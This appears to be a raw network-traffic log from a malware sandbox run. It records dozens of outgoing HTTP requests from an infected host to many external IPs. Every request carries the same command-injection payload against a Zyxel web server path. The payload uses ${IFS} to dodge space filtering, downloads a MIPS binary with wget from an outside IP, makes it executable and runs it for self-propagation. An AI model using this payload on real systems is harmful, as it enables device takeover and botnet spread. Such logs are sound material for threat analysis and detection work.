                                        Jan 14, 2024 16:18:42.404289007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3726192.168.2.133887227.223.133.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404309034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3727192.168.2.135034875.234.152.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404336929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3728192.168.2.1347126222.40.59.11443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404376984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3729192.168.2.1358624138.253.54.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404422998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3730192.168.2.1344868120.218.87.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404449940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3731192.168.2.1353052147.196.37.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404484987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3732192.168.2.1358126151.137.14.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404529095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3733192.168.2.134586023.223.111.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404594898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3734192.168.2.135453061.133.85.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404608965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3735192.168.2.1357010192.71.145.51443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404637098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3736192.168.2.1346708205.97.179.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404692888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3737192.168.2.1353386185.201.234.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404706001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3738192.168.2.135688451.176.88.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404740095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3739192.168.2.135418466.139.44.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404793024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3740192.168.2.1341340216.150.71.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404827118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3741192.168.2.1334746122.88.206.82443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404867887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3742192.168.2.135929419.34.197.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404889107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3743192.168.2.133967636.64.229.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.404956102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3744192.168.2.135387036.36.17.126443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405015945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3745192.168.2.135612693.200.202.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405054092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3746192.168.2.134393839.179.149.0443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405081034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3747192.168.2.1343850199.110.255.70443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405132055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3748192.168.2.1336864193.193.233.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405184031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3749192.168.2.13551049.48.214.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405206919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3750192.168.2.1357040144.57.207.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405234098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3751192.168.2.1358502196.49.200.173443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405263901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3752192.168.2.135919047.144.49.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405297995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3753192.168.2.13381668.107.171.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405495882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3754192.168.2.1349246221.249.120.121443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405524015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3755192.168.2.135928074.195.244.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405553102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3756192.168.2.1360226220.114.44.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405596972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3757192.168.2.1358678141.71.204.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405649900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3758192.168.2.135643274.75.183.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405690908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3759192.168.2.1354468174.104.116.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405714035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3760192.168.2.134215642.124.95.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405750036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3761192.168.2.135160086.254.4.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405785084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3762192.168.2.1357424124.73.142.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405836105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3763192.168.2.133310054.238.116.185443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405873060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3764192.168.2.134223894.117.130.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405915022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3765192.168.2.135202439.77.112.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405945063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3766192.168.2.134764879.137.144.251443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.405997992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3767192.168.2.1345698195.19.127.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406016111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3768192.168.2.1346334130.160.226.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406065941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3769192.168.2.1341896131.178.42.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406100988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3770192.168.2.1360404202.8.66.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406136990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3771192.168.2.1342928129.243.133.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406188011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3772192.168.2.1339692179.112.34.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406239986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3773192.168.2.1355732146.87.2.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406265974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3774192.168.2.1340342203.28.189.230443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406313896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3775192.168.2.1359336212.76.42.196443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406363010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3776192.168.2.1334088213.77.164.132443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406394958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3777192.168.2.135486619.16.54.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406446934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3778192.168.2.134631096.209.32.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406471968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3779192.168.2.134772895.101.240.29443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406493902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3780192.168.2.1340824167.70.161.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406544924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3781192.168.2.1355258139.172.69.188443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406574011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3782192.168.2.135122294.180.73.66443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406645060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3783192.168.2.1354606199.129.93.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406670094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3784192.168.2.1343350173.217.47.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406727076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3785192.168.2.133938077.187.185.103443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406763077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3786192.168.2.1336250174.115.207.254443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406790018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3787192.168.2.136018077.10.167.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.406833887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3788192.168.2.13376229.101.225.164443
                                        TimestampBytes transferredDirectionData
